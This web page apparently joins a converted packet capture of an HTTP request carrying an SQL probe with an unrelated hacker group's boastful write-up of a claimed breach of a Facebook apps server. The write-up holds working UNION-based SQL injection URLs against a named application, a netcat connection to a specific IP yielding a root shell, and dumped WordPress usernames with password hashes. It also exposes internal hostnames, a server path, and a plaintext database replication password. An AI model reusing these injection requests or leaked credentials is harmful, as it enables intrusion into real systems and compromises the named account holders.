Converted PCAP Traffic Samples | Certified Ethical Hackers Security Analyst Malware Hacking Information

2008-04-01 10:43:25.181143 IP 10.10.40.4.1057 > 10.10.40.5.80: S 3795861270:3795861270(0) win 64512 <mss 1460,nop,nop,sackOK>
E..0..@.....

(.

(..!.P.@?.....p....9..........
2008-04-01 10:43:25.181699 IP 10.10.40.5.80 > 10.10.40.4.1057: S 1761856733:1761856733(0) ack 3795861271 win 65535 <mss 1460,nop,nop,sackOK>
E..0+.@...j.

(.

(..P.!i....@?.p....H..........
2008-04-01 10:43:25.181734 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 1 win 64512
E..(..@.....

(.

(..!.P.@?.i...P.......
2008-04-01 10:43:25.181934 IP 10.10.40.4.1057 > 10.10.40.5.80: P 1:258(257) ack 1 win 64512
E..)..@.....

(.

(..!.P.@?.i...P...e]..GET /praveen/index.php?browse=/*select%20*%20from HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: 10.10.40.5
Connection: Keep-Alive
2008-04-01 10:43:25.183313 IP 10.10.40.5.80 > 10.10.40.4.1057: . 1:1461(1460) ack 258 win 65278
E...+.@...e.

(.

(..P.!i....@@.P...Z...HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.1
Date: Tue, 02 Mar 2010 14:53:39 GMT
Connection: close
Content-Length: 4040
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>

<META NAME="ROBOTS" CONTENT="NOINDEX">

<title>The page cannot be found</title>

<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>

<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm

//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL = document.URL;

//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);

//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);

//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;

urlresult=DocURL.substring(BeginURL,serverIndex);
2008-04-01 10:43:25.183343 IP 10.10.40.5.80 > 10.10.40.4.1057: . 1461:2921(1460) ack 258 win 65278
E...+.@...e.

(.

(..P.!i....@@.P...R~..//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);

InsertElementAnchor(urlresult, displayresult);
}

function HtmlEncode(text)
{
return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}

function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}

function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );

return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}

function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}

//-->
</script>

<body bgcolor="FFFFFF">

<table width="410" cellpadding="3" cellspacing="5">

<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be found</h1>
</td>
</tr>

<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">The page you are looking for might have been removed, had its name
2008-04-01 10:43:25.183370 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 2921 win 64512
E..(..@.....

(.

(..!.P.@@.i..FP.......
2008-04-01 10:43:25.185056 IP 10.10.40.5.80 > 10.10.40.4.1057: FP 2921:4204(1283) ack 258 win 65278
E..++.@...e.

(.

(..P.!i..F.@@.P....... changed, or is temporarily unavailable.</font></td>
</tr>

<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">

<hr color="#C0C0C0" noshade>

<p>Please try the following:</p>

<ul>
<li>If you typed the page address in the Address bar, make sure that it is
spelled correctly.<br>
</li>

<li>Open the

<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>

home page, and then look for links to the information you want.</li>

<li>Click the <a href="javascript:history.back(1)">Back</a> button to try
another link.</li>
</ul>

<h2 style="font:8pt/11pt verdana; color:000000">HTTP 404 - File not found<br>
Internet Information Services<BR></h2>

<hr color="#C0C0C0" noshade>

<p>Technical Information (for support personnel)</p>

<ul>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=404&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</ul>

</font></td>
</tr>

</table>
</body>
</html>

2008-04-01 10:43:25.185161 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 4205 win 63229
E..(..@.....

(.

(..!.P.@@.i..JP.......
2008-04-01 10:43:25.185527 IP 10.10.40.4.1057 > 10.10.40.5.80: F 258:258(0) ack 4205 win 63229
E..(..@.....

(.

(..!.P.@@.i..JP.......
2008-04-01 10:43:25.186047 IP 10.10.40.5.80 > 10.10.40.4.1057: . ack 259 win 65278
E..(+.@...j.

(.

(..P.!i..J.@@.P.............

====================================================

FaceBook's servers was hacked again by Inj3ct0r Team
====================================================
[+] English translation
    Inj3ct0r official website => Inj3ct0r.com
    Inj3ct0r community        => 0xr00t.com
                     __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___         
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\  
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \ 
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ 
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                          
               \/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\ \/\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
 \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
          [Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
   __             __      _    
 /'__`\         /'__`\  /' \   
/\ \/\ \  __  _/\ \/\ \/\_, \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ 
 \ \ \_\ \/>  </\ \ \_\ \ \ \ \
  \ \____//\_/\_\\ \____/  \ \_\
   \/___/ \//\/_/ \/___/    \/_/
        [Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...
Brevity the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
   __             __      ___    
 /'__`\         /'__`\  /'___`\  
/\ \/\ \  __  _/\ \/\ \/\_\ /\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
 \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
  \ \____//\_/\_\\ \____//\______/
   \/___/ \//\/_/ \/___/ \/_____/
              [0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
goOd =] Nice Hacking old school xD
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\_\L\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
           [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
   __             __   __ __     
 /'__`\         /'__`\/\ \\ \    
/\ \/\ \  __  _/\ \/\ \ \ \\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ 
 \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
  \ \____//\_/\_\\ \____/\/_/\_\_/
   \/___/ \//\/_/ \/___/    \/_/
             [Greetz]
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!
                       31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
                        Personally h4x0rz:
Sir Zaid (none)
You are good hackers. Respect y0u!
Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]